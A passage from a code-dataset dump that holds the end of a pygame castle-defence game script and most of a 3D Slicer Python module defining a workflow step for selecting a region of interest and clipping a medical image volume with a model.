pygame.image.load('assets/castle/png/Asset 24.png').convert_alpha()\n# castle_breaking = pygame.image.load('assets/castle/png/Asset 22.png').convert_alpha()\n# castle_fully_destroyed = pygame.image.load('assets/castle/png/Asset 23.png').convert_alpha()\n\n#----Cannon\n\nbullet_asset = pygame.image.load('assets/cannon/shoot2.png').convert_alpha()\nb_w = bullet_asset.get_width()\nb_h = bullet_asset.get_height()\nbullet_asset = pygame.transform.scale(bullet_asset, (int(b_w * 1.5), int(b_h * 1.5)))\n\n#----Enemys\n\nenemy_animations = []\nenemy_types = ['skeleton']\nenemy_health = [100]\n\nanimation_types = ['walk', 'attack', 'death']\n\nfor enemy in enemy_types:\n\n #load animation\n animation_list = []\n for animation in animation_types:\n\n ##reset sprites list\n\n temp_list = []\n\n #define number of frames\n num_of_frames = 6\n for f_i in range(num_of_frames):\n assets = pygame.image.load(f'assets/monsters/{enemy}/{animation}/{f_i}.png').convert_alpha()\n e_w = assets.get_width()\n e_h = assets.get_height()\n assets = pygame.transform.scale(assets, (int(e_w * 2), int(e_h * 2)))\n temp_list.append(assets)\n animation_list.append(temp_list)\n enemy_animations.append(animation_list)\n\n# ----------Class\n\n#----Castle\n\nclass Castle():\n def __init__(self, cas_100, x, y, scale):\n self.health = 999\n self.max_health = self.health\n self.fired = False\n width = cas_100.get_width()\n height = cas_100.get_height()\n\n self.cas_100 = pygame.transform.scale(cas_100, (int(width * scale), int(height * scale)))\n self.rect = self.cas_100.get_rect()\n self.rect.x = x\n self.rect.y = y\n\n def shoot(self):\n pos = pygame.mouse.get_pos()\n x_dist = pos[0] - self.rect.midleft[0]\n y_dist = -(pos[1] - self.rect.midleft[1])\n self.angle = math.degrees(math.atan2(y_dist, x_dist))\n\n#---Get mouse clicks\n if pygame.mouse.get_pressed()[0] and self.fired == False:\n self.fired = True\n bullet2 = Bullet(bullet_asset, self.rect.midleft[0], self.rect.midleft[1], self.angle)\n bullet_comp.add(bullet2)\n #pygame.draw.line(screen, BLACK, (self.rect.midleft[0], self.rect.midleft[1]), (pos))\n\n if pygame.mouse.get_pressed()[0] == False:\n self.fired = False\n\n\n def draw(self):\n self.image = self.cas_100\n screen.blit(self.image, self.rect)\n\n#----Bullets\n\nclass Bullet(pygame.sprite.Sprite):\n def __init__(self, image, x, y, angle):\n pygame.sprite.Sprite.__init__(self)\n self.image = image\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n self.angle = math.radians(angle)\n self.speed = 10\n self.dx = math.cos(self.angle) * self.speed\n self.dy = -(math.sin(self.angle) * self.speed)\n\n def update(self):\n #----Bullets gone out the sceen\n if self.rect.right < 0 or self.rect.left > screen_width or self.rect.bottom < 0 or self.rect.top > screen_height:\n self.kill()\n\n self.rect.x += self.dx\n self.rect.y += self.dy\n\ncas_comp = Castle(castle_healthy, screen_width - 310, screen_height - 350, 0.3)\n\nbullet_comp = pygame.sprite.Group()\nenemy_comp = pygame.sprite.Group()\n\n#create enemies\n\n\nenemy_1 = Enemy(enemy_health[0], enemy_animations[0], 200, screen_height - 220, 1)\nenemy_comp.add(enemy_1)\n\n#----------Game loop\n\nrun = True\nwhile run:\n clock.tick(fps)\n\n#----------Raise Assets\n\n c_i += 0.1\n screen.blit(bg_layer6, (0, 0))\n screen.blit(bg_layer2, (0, 0))\n screen.blit(bg_layer3, (0, 0))\n screen.blit(bg_layer4, (0, 0))\n screen.blit(bg_layer5, (0, 0))\n\n cas_comp.draw()\n cas_comp.shoot()\n\n bullet_comp.update()\n bullet_comp.draw(screen)\n\n # draw enemies\n enemy_comp.update(screen, cas_comp, bullet_comp)\n\n screen.blit(Bg_front, (-960 + c_i, 0))\n screen.blit(Bg_front, (960 + c_i, 0))\n screen.blit(Bg_front, (2880 + c_i, 0))\n\n# print(bullet_comp)\n# print(c_i) #clouds interator need to be polished\n\n#----------event handler\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n\n#----------Update display\n\n pygame.display.update()\n\npygame.quit()\n","repo_name":"casote/Castle-Never-Break","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10445348896","text":"\"\"\" This is Step 4. The user selects a ROI and subtracts the two images.\n\tMuch of this step is copied from ChangeTracker, located at \n\thttps://github.com/fedorov/ChangeTrackerPy. This step can be\n\texcessively slow, and at one point crashed Slicer; more investigation\n\tis needed.\n\"\"\"\n\nfrom __main__ import qt, ctk, slicer\n\nfrom BeersSingleStep import *\nfrom Helper import *\nimport PythonQt\n\n\"\"\" ROIStep inherits from BeersSingleStep, with itself inherits\n\tfrom a ctk workflow class. PythonQT is required for this step\n\tin order to get the ROI selector widget.\n\"\"\"\n\nclass ROIStep( BeersSingleStep ) :\n\n\tdef __init__( self, stepid ):\n\n\t\t\"\"\" This method creates a drop-down menu that includes the whole step.\n\t\tThe description also acts as a tooltip for the button. There may be \n\t\tsome way to override this. The initialize method is inherited\n\t\tfrom ctk.\n\t\t\"\"\"\n\n\t\tself.initialize( stepid )\n\t\tself.setName( '4. Define ROI' )\n\t\tself.setDescription( 'Select a region of interest, either with a pre-defined ROI or with the interactive tools below.' )\n\n\t\tself.__logic = VolumeClipWithModelLogic()\n\t\tself.__parameterNode = None\n\t\tself.__parameterNodeObserver = None\n\t\tself.__clippingMarkupNode = None\n\t\tself.__clippingMarkupNodeObserver = None\n\n\t\tself.__parent = super( ROIStep, self )\n\n\t\tself.__vrDisplayNode = None\n\n\t\tself.__roiTransformNode = None\n\t\tself.__baselineVolume = None\n\n\t\tself.__roi = None\n\t\tself.__roiObserverTag = None\n\n\t\tself.__CubicROI = False\n\t\tself.__ConvexROI = True\n\n\tdef createUserInterface( self ):\n\n\t\t\"\"\" This UI allows you to either select a predefined ROI via the \n\t\t\tvtkMRMLAnnotationROINode feature, or to specify your own using\n\t\t\tPythonQt's qMRMLAnnotationROIWidget. That creates a fairly large\n\t\t\tbox with 3 sliders to adjust your ROI in three dimensions. There is\n\t\t\talso a ROI drow-down selector for those who have a pre-loaded ROI.\n\t\t\"\"\"\n\n\t\tself.__layout = self.__parent.createUserInterface()\n\n\t\tModelCollapisbleButton = ctk.ctkCollapsibleButton()\n\t\tModelCollapisbleButton.text = \"Curved ROI:\"\n\t\tself.__layout.addWidget(ModelCollapisbleButton)\n\t\tModelFormLayout = qt.QFormLayout(ModelCollapisbleButton)\n\n\t\tself.__clippingModelSelector = slicer.qMRMLNodeComboBox()\n\t\tself.__clippingModelSelector.nodeTypes = ((\"vtkMRMLModelNode\"), \"\")\n\t\tself.__clippingModelSelector.addEnabled = True\n\t\tself.__clippingModelSelector.removeEnabled = False\n\t\tself.__clippingModelSelector.noneEnabled = True\n\t\tself.__clippingModelSelector.showHidden = False\n\t\tself.__clippingModelSelector.renameEnabled = True\n\t\tself.__clippingModelSelector.selectNodeUponCreation = True\n\t\tself.__clippingModelSelector.showChildNodeTypes = False\n\t\tself.__clippingModelSelector.setMRMLScene(slicer.mrmlScene)\n\t\tself.__clippingModelSelector.setToolTip(\"Choose the clipping surface model.\")\n\t\tModelFormLayout.addRow(\"Curved ROI Model: \", self.__clippingModelSelector)\n\n\t\tself.__clippingMarkupSelector = slicer.qMRMLNodeComboBox()\n\t\tself.__clippingMarkupSelector.nodeTypes = ((\"vtkMRMLMarkupsFiducialNode\"), \"\")\n\t\tself.__clippingMarkupSelector.addEnabled = True\n\t\tself.__clippingMarkupSelector.removeEnabled = False\n\t\tself.__clippingMarkupSelector.noneEnabled = True\n\t\tself.__clippingMarkupSelector.showHidden = False\n\t\tself.__clippingMarkupSelector.renameEnabled = True\n\t\tself.__clippingMarkupSelector.baseName = \"Markup\"\n\t\tself.__clippingMarkupSelector.setMRMLScene(slicer.mrmlScene)\n\t\tself.__clippingMarkupSelector.setToolTip(\"Use markup points to determine a convex ROI.\")\n\t\tModelFormLayout.addRow(\"Curved ROI Markups: \", self.__clippingMarkupSelector)\n\n\t\t# ROICollapisbleButton = ctk.ctkCollapsibleButton()\n\t\t# ROICollapisbleButton.text = \"Cubic ROI:\"\n\t\t# # ROICollapisbleButton.collapse()\n\t\t# # print dir(ROICollapisbleButton)\n\t\t# self.__layout.addWidget(ROICollapisbleButton)\n\t\t# ROIFormLayout = qt.QFormLayout(ROICollapisbleButton)\n\n\t\t# self.valueEditWidgets = {\"ClipOutsideSurface\": True, \"FillValue\": 0}\n\t\t# # self.nodeSelectorWidgets = {\"InputVolume\": self.inputVolumeSelector, \"ClippingModel\": self.clippingModelSelector, \"ClippingMarkup\": self.clippingMarkupSelector, \"OutputVolume\": self.outputVolumeSelector}\n\n\t\t# roiLabel = qt.QLabel( 'Select ROI:' )\n\t\t# self.__roiSelector = slicer.qMRMLNodeComboBox()\n\t\t# self.__roiSelector.nodeTypes = ['vtkMRMLAnnotationROINode']\n\t\t# self.__roiSelector.toolTip = \"ROI defining the structure of interest\"\n\t\t# self.__roiSelector.setMRMLScene(slicer.mrmlScene)\n\t\t# self.__roiSelector.addEnabled = 1\n\t\t# self.__roiSelector.setEnabled(0)\n\n\t\t# ROIFormLayout.addRow( roiLabel, self.__roiSelector )\n\n\t\t# self.__roiSelector.connect(\"currentNodeChanged(vtkMRMLNode*)\", self.onROIChanged)\n\n\t\t# voiGroupBox = qt.QGroupBox()\n\t\t# voiGroupBox.setTitle( 'Define ROI' )\n\t\t# ROIFormLayout.addRow( voiGroupBox )\n\n\t\t# voiGroupBoxLayout = qt.QFormLayout( voiGroupBox )\n\n\t\t# # PythonQt has a pre-configured ROI widget. Useful!\n\t\t# self.__roiWidget = PythonQt.qSlicerAnnotationsModuleWidgets.qMRMLAnnotationROIWidget()\n\t\t# voiGroupBoxLayout.addRow( self.__roiWidget )\n\t\t# self.__roiWidget.setEnabled(0)\n\n\t\t# Intialize Volume Rendering...\n\t\tself.__vrLogic = slicer.modules.volumerendering.logic()\n\n\t\tqt.QTimer.singleShot(0, self.killButton)\n\n\t\t# self.__clippingModelSelector.connect(\"currentNodeChanged(vtkMRMLNode*)\", self.onClippingModelSelect)\n\t\tself.__clippingMarkupSelector.connect(\"currentNodeChanged(vtkMRMLNode*)\", self.onClippingMarkupSelect)\n\n\tdef cleanup(self):\n\t\tself.removeGUIObservers()\n\t\tself.setAndObserveParameterNode(None)\n\t\tself.setAndObserveClippingMarkupNode(None)\n\t\tpass\n\n\tdef setAndObserveParameterNode(self, parameterNode):\n\t\tif parameterNode == self.__parameterNode and self.__parameterNodeObserver:\n\t\t\t# no change and node is already observed\n\t\t\treturn\n\t\t# Remove observer to old parameter node\n\t\tif self.__parameterNode and self.__parameterNodeObserver:\n\t\t\tself.__parameterNode.RemoveObserver(self.__parameterNodeObserver)\n\t\t\tself.__parameterNodeObserver = None\n\t\t# Set and observe new parameter node\n\t\tself.__parameterNode = parameterNode\n\t\tif self.__parameterNode:\n\t\t\tself.__parameterNodeObserver = self.__parameterNode.AddObserver(vtk.vtkCommand.ModifiedEvent, self.onParameterNodeModified)\n\t\t# Update GUI\n\t\tself.updateGUIFromParameterNode()\n\n\tdef setAndObserveClippingMarkupNode(self, clippingMarkupNode):\n\t\tif clippingMarkupNode == self.__clippingMarkupNode and self.__clippingMarkupNodeObserver:\n\t\t\t# no change and node is already observed\n\t\t\treturn\n\t\t# Remove observer to old parameter node\n\t\tif self.__clippingMarkupNode and self.__clippingMarkupNodeObserver:\n\t\t\tself.__clippingMarkupNode.RemoveObserver(self.__clippingMarkupNodeObserver)\n\t\t\tself.__clippingMarkupNodeObserver = None\n\t\t# Set and observe new parameter node\n\t\tself.__clippingMarkupNode = clippingMarkupNode\n\t\tif self.__clippingMarkupNode:\n\t\t\tself.__clippingMarkupNodeObserver = self.__clippingMarkupNode.AddObserver(vtk.vtkCommand.ModifiedEvent, self.onClippingMarkupNodeModified)\n\t\t# Update GUI\n\t\tself.updateModelFromClippingMarkupNode()\n\n\tdef onClippingMarkupNodeModified(self, observer, eventid):\n\t\tself.updateModelFromClippingMarkupNode()\n\n\tdef onParameterNodeModified(self, observer, eventid):\n\t\tself.updateGUIFromParameterNode()\n\n\tdef getParameterNode(self):\n\t\treturn self.__parameterNode\n\n\tdef updateModelFromClippingMarkupNode(self):\n\t\tif not self.__clippingMarkupNode or not self.__clippingModelSelector.currentNode():\n\t\t\treturn\n\t\tself.__logic.updateModelFromMarkup(self.__clippingMarkupNode, self.__clippingModelSelector.currentNode())\n\n\tdef onClippingMarkupSelect(self, node):\n\t\tself.setAndObserveClippingMarkupNode(self.__clippingMarkupSelector.currentNode())\n\n\tdef killButton(self):\n\n\t\t# ctk creates a useless final page button. This method gets rid of it.\n\t\tbl = slicer.util.findChildren(text='ReviewStep')\n\t\tif len(bl):\n\t\t\tbl[0].hide()\n\n\t# def onROIChanged(self):\n\n\t# \t\"\"\" This method accounts for changing ROI nodes entirely, rather than the\n\t# \t\tparameters of individual nodes.\n\t# \t\"\"\"\n\n\t# \troi = self.__roiSelector.currentNode()\n\n\t# \tif roi != None:\n\t# \t\tself.__roi = roi\n\t\n\t# \t\tpNode = self.parameterNode()\n\n\t# \t\tself.__vrDisplayNode.SetAndObserveROINodeID(roi.GetID())\n\t# \t\tself.__vrDisplayNode.SetCroppingEnabled(1)\n\t# \t\tself.__vrDisplayNode.VisibilityOn()\n\n\t# \t\troi.SetAndObserveTransformNodeID(self.__roiTransformNode.GetID())\n\n\t# \t\t# Removes unneeded observers, freeing running time.\n\t# \t\tif self.__roiObserverTag != None:\n\t# \t\t\tself.__roi.RemoveObserver(self.__roiObserverTag)\n\n\t# \t\tself.__roiObserverTag = self.__roi.AddObserver('ModifiedEvent', self.processROIEvents)\n\n\t# \t\troi.SetInteractiveMode(1)\n\n\t# \t\tself.__roiWidget.setMRMLAnnotationROINode(roi)\n\t# \t\tself.__roi.SetDisplayVisibility(1)\n\t \n\t# def processROIEvents(self,node,event):\n\t# \t\"\"\" A rather repetitive step that does the hard work of computing\n\t# \t\tIJK boundaries in vtk and RAS boundaries in Slicer. Also adjusts\n\t# \t\tthe opacity of the volume rendering node.\n\t# \t\"\"\"\n\n\t# \t# Get the IJK bounding box of the voxels inside ROI.\n\t# \troiCenter = [0,0,0]\n\t# \troiRadius = [0,0,0]\n\n\t# \t# Note that these methods modify roiCenter and roiRadius.\n\t# \tself.__roi.GetXYZ(roiCenter)\n\t# \tself.__roi.GetRadiusXYZ(roiRadius)\n\n\t# \t# TO-DO: Understand coordinate changes being performed.\n\t# \troiCorner1 = [roiCenter[0]+roiRadius[0],roiCenter[1]+roiRadius[1],roiCenter[2]+roiRadius[2],1]\n\t# \troiCorner2 = [roiCenter[0]+roiRadius[0],roiCenter[1]+roiRadius[1],roiCenter[2]-roiRadius[2],1]\n\t# \troiCorner3 = [roiCenter[0]+roiRadius[0],roiCenter[1]-roiRadius[1],roiCenter[2]+roiRadius[2],1]\n\t# \troiCorner4 = [roiCenter[0]+roiRadius[0],roiCenter[1]-roiRadius[1],roiCenter[2]-roiRadius[2],1]\n\t# \troiCorner5 = [roiCenter[0]-roiRadius[0],roiCenter[1]+roiRadius[1],roiCenter[2]+roiRadius[2],1]\n\t# \troiCorner6 = [roiCenter[0]-roiRadius[0],roiCenter[1]+roiRadius[1],roiCenter[2]-roiRadius[2],1]\n\t# \troiCorner7 = [roiCenter[0]-roiRadius[0],roiCenter[1]-roiRadius[1],roiCenter[2]+roiRadius[2],1]\n\t# \troiCorner8 = [roiCenter[0]-roiRadius[0],roiCenter[1]-roiRadius[1],roiCenter[2]-roiRadius[2],1]\n\n\t# \tras2ijk = vtk.vtkMatrix4x4()\n\t# \tself.__subtractVolume.GetRASToIJKMatrix(ras2ijk)\n\n\t# \troiCorner1ijk = ras2ijk.MultiplyPoint(roiCorner1)\n\t# \troiCorner2ijk = ras2ijk.MultiplyPoint(roiCorner2)\n\t# \troiCorner3ijk = ras2ijk.MultiplyPoint(roiCorner3)\n\t# \troiCorner4ijk = ras2ijk.MultiplyPoint(roiCorner4)\n\t# \troiCorner5ijk = ras2ijk.MultiplyPoint(roiCorner5)\n\t# \troiCorner6ijk = ras2ijk.MultiplyPoint(roiCorner6)\n\t# \troiCorner7ijk = ras2ijk.MultiplyPoint(roiCorner7)\n\t# \troiCorner8ijk = ras2ijk.MultiplyPoint(roiCorner8)\n\n\t# \tlowerIJK = [0, 0, 0]\n\t# \tupperIJK = [0, 0, 0]\n\n\t# \tlowerIJK[0] = min(roiCorner1ijk[0],roiCorner2ijk[0],roiCorner3ijk[0],roiCorner4ijk[0],roiCorner5ijk[0],roiCorner6ijk[0],roiCorner7ijk[0],roiCorner8ijk[0])\n\t# \tlowerIJK[1] = min(roiCorner1ijk[1],roiCorner2ijk[1],roiCorner3ijk[1],roiCorner4ijk[1],roiCorner5ijk[1],roiCorner6ijk[1],roiCorner7ijk[1],roiCorner8ijk[1])\n\t# \tlowerIJK[2] = min(roiCorner1ijk[2],roiCorner2ijk[2],roiCorner3ijk[2],roiCorner4ijk[2],roiCorner5ijk[2],roiCorner6ijk[2],roiCorner7ijk[2],roiCorner8ijk[2])\n\n\t# \tupperIJK[0] = max(roiCorner1ijk[0],roiCorner2ijk[0],roiCorner3ijk[0],roiCorner4ijk[0],roiCorner5ijk[0],roiCorner6ijk[0],roiCorner7ijk[0],roiCorner8ijk[0])\n\t# \tupperIJK[1] = max(roiCorner1ijk[1],roiCorner2ijk[1],roiCorner3ijk[1],roiCorner4ijk[1],roiCorner5ijk[1],roiCorner6ijk[1],roiCorner7ijk[1],roiCorner8ijk[1])\n\t# \tupperIJK[2] = max(roiCorner1ijk[2],roiCorner2ijk[2],roiCorner3ijk[2],roiCorner4ijk[2],roiCorner5ijk[2],roiCorner6ijk[2],roiCorner7ijk[2],roiCorner8ijk[2])\n\n\t# \t# All of this ijk work is needed for using vtk to compute a sub-region.\n\t# \timage = self.__subtractVolume.GetImageData()\n\t# \tclipper = vtk.vtkImageClip()\n\t# \tclipper.ClipDataOn()\n\t# \tclipper.SetOutputWholeExtent(int(lowerIJK[0]),int(upperIJK[0]),int(lowerIJK[1]),int(upperIJK[1]),int(lowerIJK[2]),int(upperIJK[2]))\n\t# \tif vtk.VTK_MAJOR_VERSION <= 5:\n\t# \t\tclipper.SetInput(image)\n\t# \telse:\n\t# \t\tclipper.SetInputData(image)\n\t# \tclipper.Update()\n\t# \troiImageRegion = clipper.GetOutput()\n\n\t# \t# Opacity thresholds are constantly adjusted to the range of pixels within the ROI.\n\t# \tintRange = roiImageRegion.GetScalarRange()\n\t# \tlThresh = 0.4*(intRange[0]+intRange[1])\n\t# \tuThresh = intRange[1]\n\n\t# \tself.__vrOpacityMap.RemoveAllPoints()\n\t# \tself.__vrOpacityMap.AddPoint(0,0)\n\t# \tself.__vrOpacityMap.AddPoint(lThresh-1,0)\n\t# \tself.__vrOpacityMap.AddPoint(lThresh,1)\n\t# \tself.__vrOpacityMap.AddPoint(uThresh,1)\n\t# \tself.__vrOpacityMap.AddPoint(uThresh+1,0)\n\n\t# \t# Center the camera on the new ROI. Author of ChangeTracker suggested errors in this method.\n\t# \tcamera = slicer.mrmlScene.GetNodeByID('vtkMRMLCameraNode1')\n\t# \tcamera.SetFocalPoint(roiCenter)\n\n\tdef validate( self, desiredBranchId ):\n\n\t\t# Makes sure there actually is a ROI...\n\t\t# roi = self.__roiSelector.currentNode()\n\n\t\tif not (self.__clippingMarkupSelector.currentNode() or self.__clippingMarkupSelector.currentNode()):\n\t\t\tself.__parent.validationFailed(desiredBranchId, 'Error', 'You must choose at least one ROI to continue.')\n\t\t\t\n\t\tself.__parent.validationSucceeded(desiredBranchId)\n\n\tdef onEntry(self,comingFrom,transitionType):\n\n\t\t\"\"\" This method calls most other methods in this function to initialize the ROI\n\t\t\twizard. This step in particular applies the ROI IJK/RAS coordinate transform\n\t\t\tcalculated in the previous step and checks for any pre-existing ROIs. Also\n\t\t\tintializes the volume-rendering node.\n\t\t\"\"\"\n\n\t\tsuper(ROIStep, self).onEntry(comingFrom, transitionType)\n\n\t\t# I believe this changes the layout to four-up; will check.\n\t\tlm = slicer.app.layoutManager()\n\t\tlm.setLayout(3)\n\t\tpNode = self.parameterNode()\n\t\tHelper.SetLabelVolume(None)\n\t\tself.__subtractVolume = slicer.mrmlScene.GetNodeByID(pNode.GetParameter('subtractVolumeID'))\n\t\tHelper.SetBgFgVolumes(pNode.GetParameter('subtractVolumeID'),'')\n\n\t\tslices = [lm.sliceWidget('Red'),lm.sliceWidget('Yellow'),lm.sliceWidget('Green')]\n\t\tfor s in slices:\n\t\t\ts.sliceLogic().GetSliceNode().SetSliceVisible(0)\n\n\t\t# Apply the transform node created in the previous step.\n\t\troiTfmNodeID = pNode.GetParameter('roiTransformID')\n\t\tif roiTfmNodeID != '':\n\t\t\tself.__roiTransformNode = Helper.getNodeByID(roiTfmNodeID)\n\t\telse:\n\t\t\tHelper.Error('Internal error! Error code CT-S2-NRT, please report!')\n\n\t\t# If a ROI exists, grab it. Note that this function calls onROIChanged()\n\t\t# self.updateWidgetFromParameterNode(pNode)\n\n\t\t# Note that this clause initializes volume rendering.\n\t\tif self.__roi != None:\n\t\t\tself.__roi.SetDisplayVisibility(1)\n\t\t\t# self.InitVRDisplayNode()\n\n\t\tpNode.SetParameter('currentStep', self.stepid)\n\t\t\n\t\tqt.QTimer.singleShot(0, self.killButton)\n\n\tdef onExit(self, goingTo, transitionType):\n\n\t\t# Does a great deal of work to prepare for the segmentation step.\n\t\tself.ThresholdPrep()\n\n\t\tpNode = self.parameterNode()\n\n\t\tlm = slicer.app.layoutManager()\n\t\tslices = [lm.sliceWidget('Red'),lm.sliceWidget('Yellow'),lm.sliceWidget('Green')]\n\t\tfor s in slices:\n\t\t\ts.sliceLogic().GetSliceNode().SetSliceVisible(0)\n\n\t\tpNode.SetParameter('clippingModelNodeID', self.__clippingModelSelector.currentNode().GetID())\n\t\tpNode.SetParameter('clippingMarkupNodeID', self.__clippingMarkupSelector.currentNode().GetID())\n\t\tself.__clippingModelSelector.currentNode().GetDisplayNode().VisibilityOff()\n\t\tself.__clippingMarkupSelector.currentNode().GetDisplayNode().VisibilityOff()\n\n\t\tif self.__roi != None:\n\t\t\tself.__roi.RemoveObserver(self.__roiObserverTag)\n\t\t\tself.__roi.SetDisplayVisibility(0)\n\n\t\tif self.__vrDisplayNode != None:\n\t\t\t# self.__vrDisplayNode.VisibilityOff()\n\t\t\tpNode.SetParameter('vrDisplayNodeID', self.__vrDisplayNode.GetID())\n\n\t\tif self.__CubicROI:\n\t\t\tpNode.SetParameter('roiNodeID', self.__roiSelector.currentNode().GetID())\n\n\t\tsuper(ROIStep, self).onExit(goingTo, transitionType)\n\n\tdef updateWidgetFromParameterNode(self, parameterNode):\n\n\t\t\"\"\" Effectively creates the ROI node upon entry, and then uses onROIChanged\n\t\t\tto calculate its intial position.\n\t\t\"\"\"\n\n\t\troiNodeID = parameterNode.GetParameter('roiNodeID')\n\n\t\tif roiNodeID != '':\n\t\t\tself.__roi = slicer.mrmlScene.GetNodeByID(roiNodeID)\n\t\t\tself.__roiSelector.setCurrentNode(Helper.getNodeByID(self.__roi.GetID()))\n\t\telse:\n\t\t\troi = slicer.vtkMRMLAnnotationROINode()\n\t\t\troi.Initialize(slicer.mrmlScene)\n\t\t\tparameterNode.SetParameter('roiNodeID', roi.GetID())\n\t\t\tself.__roiSelector.setCurrentNode(roi)\n\t\t\n\t\tself.onROIChanged()\n\t\t\n\tdef ThresholdPrep(self):\n\n\t\t\"\"\" This method prepares for the following segmentation/thresholding\n\t\t\tstep. It accomplishes a few things. It uses the cropvolume Slicer\n\t\t\tmodule to create a new, ROI-only node. It then creates a label volume\n\t\t\tand initializes threholds variables for the next step.\n\t\t\"\"\"\n\n\t\tpNode = self.parameterNode()\n\t\tbaselineVolumeID = pNode.GetParameter('baselineVolumeID')\n\t\tfollowupVolumeID = pNode.GetParameter('followupVolumeID')\n\n\t\tfollowupVolume = Helper.getNodeByID(followupVolumeID)\n\t\tbaselineVolume = Helper.getNodeByID(baselineVolumeID)\n\n\t\tif self.__ConvexROI:\n\t\t\toutputVolume = slicer.vtkMRMLScalarVolumeNode()\n\t\t\tslicer.mrmlScene.AddNode(outputVolume)\n\n\t\t\tHelper.SetLabelVolume(None)\n\n\t\t\t# Crop volume to Convex ROI\n\t\t\tinputVolume = self.__subtractVolume\n\t\t\toutputVolume = outputVolume\n\t\t\tclippingModel = self.__clippingModelSelector.currentNode()\n\t\t\tclipOutsideSurface = True\n\t\t\tfillValue = inputVolume.GetImageData().GetScalarRange()[0] - 1\n\n\t\t\tself.__logic.clipVolumeWithModel(inputVolume, clippingModel, clipOutsideSurface, fillValue, outputVolume)\n\n\t\t\tself.__logic.showInSliceViewers(outputVolume, [\"Red\", \"Yellow\", \"Green\"])\n\n\t\t\toutputVolume.SetName(baselineVolume.GetName() + '_subtraction_roi')\n\t\t\tpNode.SetParameter('croppedSubtractVolumeID',outputVolume.GetID())\n\t\t\tpNode.SetParameter('ROIType', 'convex')\n\n\t\tif self.__CubicROI:\n\t\t\t# Crop volume to Cubic ROI.\n\t\t\tcropVolumeNode = slicer.vtkMRMLCropVolumeParametersNode()\n\t\t\tcropVolumeNode.SetScene(slicer.mrmlScene)\n\t\t\tcropVolumeNode.SetName('T1_Contrast_CropVolume_node')\n\t\t\tcropVolumeNode.SetIsotropicResampling(True)\n\t\t\tcropVolumeNode.SetSpacingScalingConst(0.5)\n\t\t\tslicer.mrmlScene.AddNode(cropVolumeNode)\n\n\t\t\tcropVolumeNode.SetInputVolumeNodeID(pNode.GetParameter('subtractVolumeID'))\n\t\t\tcropVolumeNode.SetROINodeID(pNode.GetParameter('roiNodeID'))\n\n\t\t\tcropVolumeLogic = slicer.modules.cropvolume.logic()\n\t\t\tcropVolumeLogic.Apply(cropVolumeNode)\n\n\t\t\toutputVolume = slicer.mrmlScene.GetNodeByID(cropVolumeNode.GetOutputVolumeNodeID())\n\t\t\toutputVolume.SetName(baselineVolume.GetName() + '_subtraction_roi')\n\t\t\tpNode.SetParameter('croppedSubtractVolumeID',cropVolumeNode.GetOutputVolumeNodeID())\n\n\t\t\tpNode.SetParameter('ROIType', 'cubic')\n\n\t\t# Get starting threshold parameters.\n\t\troiSegmentationID = pNode.GetParameter('croppedSubtractVolumeSegmentationID') \n\t\tif roiSegmentationID == '':\n\t\t\troiRange = outputVolume.GetImageData().GetScalarRange()\n\n\t\t\tthresholdParameter = str(0.5*(roiRange[0]+roiRange[1]))+','+str(roiRange[1])\n\t\t\tpNode.SetParameter('thresholdRange', thresholdParameter)\n\n\t\t# Create a label node for segmentation.\n\t\tvl = slicer.modules.volumes.logic()\n\t\troiSegmentation = vl.CreateLabelVolume(slicer.mrmlScene, outputVolume, baselineVolume.GetName() + '_subtraction_annotation')\n\t\tpNode.SetParameter('croppedSubtractVolumeSegmentationID', roiSegmentation.GetID())\n\nclass VolumeClipWithModelLogic(ScriptedLoadableModuleLogic):\n\t\"\"\"This class should implement all the actual\n\tcomputation done by your module. The interface\n\tshould be such that other python code can import\n\tthis class and make use of the functionality without\n\trequiring an instance of the Widget\n\t\"\"\"\n\n\tdef createParameterNode(self):\n\t\t# Set default parameters\n\t\tnode = ScriptedLoadableModuleLogic.createParameterNode(self)\n\t\tnode.SetName(slicer.mrmlScene.GetUniqueNameByString(self.moduleName))\n\t\tnode.SetParameter(\"ClipOutsideSurface\", \"1\")\n\t\tnode.SetParameter(\"FillValue\", \"-1\")\n\t\treturn node\n\n\tdef clipVolumeWithModel(self, inputVolume, clippingModel, clipOutsideSurface, fillValue, outputVolume):\n\t\t\"\"\"\n\t\tFill voxels of the input volume inside/outside the clipping model with the provided fill value\n\t\t\"\"\"\n\t\t\n\t\t# Determine the transform between the box and the image IJK coordinate systems\n\t\t\n\t\trasToModel = vtk.vtkMatrix4x4() \n\t\tif clippingModel.GetTransformNodeID() != None:\n\t\t\tmodelTransformNode = slicer.mrmlScene.GetNodeByID(clippingModel.GetTransformNodeID())\n\t\t\tboxToRas = vtk.vtkMatrix4x4()\n\t\t\tmodelTransformNode.GetMatrixTransformToWorld(boxToRas)\n\t\t\trasToModel.DeepCopy(boxToRas)\n\t\t\trasToModel.Invert()\n\t\t\t\n\t\tijkToRas = vtk.vtkMatrix4x4()\n\t\tinputVolume.GetIJKToRASMatrix( ijkToRas )\n\n\t\tijkToModel = vtk.vtkMatrix4x4()\n\t\tvtk.vtkMatrix4x4.Multiply4x4(rasToModel,ijkToRas,ijkToModel)\n\t\tmodelToIjkTransform = vtk.vtkTransform()\n\t\tmodelToIjkTransform.SetMatrix(ijkToModel)\n\t\tmodelToIjkTransform.Inverse()\n\t\t\n\t\ttransformModelToIjk=vtk.vtkTransformPolyDataFilter()\n\t\ttransformModelToIjk.SetTransform(modelToIjkTransform)\n\t\ttransformModelToIjk.SetInputConnection(clippingModel.GetPolyDataConnection())\n\n\t\t# Use the stencil to fill the volume\n\t\t\n\t\t# Convert model to stencil\n\t\tpolyToStencil = vtk.vtkPolyDataToImageStencil()\n\t\tpolyToStencil.SetInputConnection(transformModelToIjk.GetOutputPort())\n\t\tpolyToStencil.SetOutputSpacing(inputVolume.GetImageData().GetSpacing())\n\t\tpolyToStencil.SetOutputOrigin(inputVolume.GetImageData().GetOrigin())\n\t\tpolyToStencil.SetOutputWholeExtent(inputVolume.GetImageData().GetExtent())\n\t\t\n\t\t# Apply the stencil to the volume\n\t\tstencilToImage=vtk.vtkImageStencil()\n\t\tstencilToImage.SetInputConnection(inputVolume.GetImageDataConnection())\n\t\tstencilToImage.SetStencilConnection(polyToStencil.GetOutputPort())\n\t\tif 